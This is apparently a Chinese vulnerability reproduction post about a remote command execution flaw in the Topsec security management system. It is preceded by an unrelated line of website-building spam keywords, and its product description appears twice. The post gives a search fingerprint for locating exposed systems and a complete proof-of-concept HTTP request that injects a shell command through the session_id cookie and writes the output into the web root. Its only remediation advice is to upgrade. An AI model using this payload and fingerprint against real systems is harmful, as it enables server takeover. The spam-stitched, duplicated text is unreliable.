北京网站建设怎么样天,四川建设网四川住建厅,买布自己做网站衣服的,聚搜济南网站建设公司产品介绍
天融信TopSec 安全管理系统#xff0c;是基于大数据架构#xff0c;采用多种技术手段收集各类探针设备安全数据#xff0c;围绕资产、漏洞、攻击、威胁等安全要素进行全面分析#xff0c;提供统一监测告警、集中策略管控、协同处置流程#xff0c;实现客户等保合…产品介绍
天融信TopSec 安全管理系统是基于大数据架构采用多种技术手段收集各类探针设备安全数据围绕资产、漏洞、攻击、威胁等安全要素进行全面分析提供统一监测告警、集中策略管控、协同处置流程实现客户等保合规、资产统一管理、风险一键阻断等应用价值。
漏洞描述
天融信TopSec安全管理系统 Cookie字段存在远程命令执行漏洞通过该漏洞攻击者可通过构造恶意字符串执行任意系统命令从而拿下服务器权限。
资产测绘
title“Web User Login” body“/cgi/maincgi.cgi?UrlVerifyCode”
漏洞复现
POC如下
GET /cgi/maincgi.cgi?Urlaa HTTP/1.1
Host: your_ip
Cookie: session_id_4431|echo id /www/htdocs/site/image/qqqq.txt;
User-Agent: Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36查看回显
可执行任意系统命令需尽快修复。
修复建议
联系软件厂商升级至最新安全版本
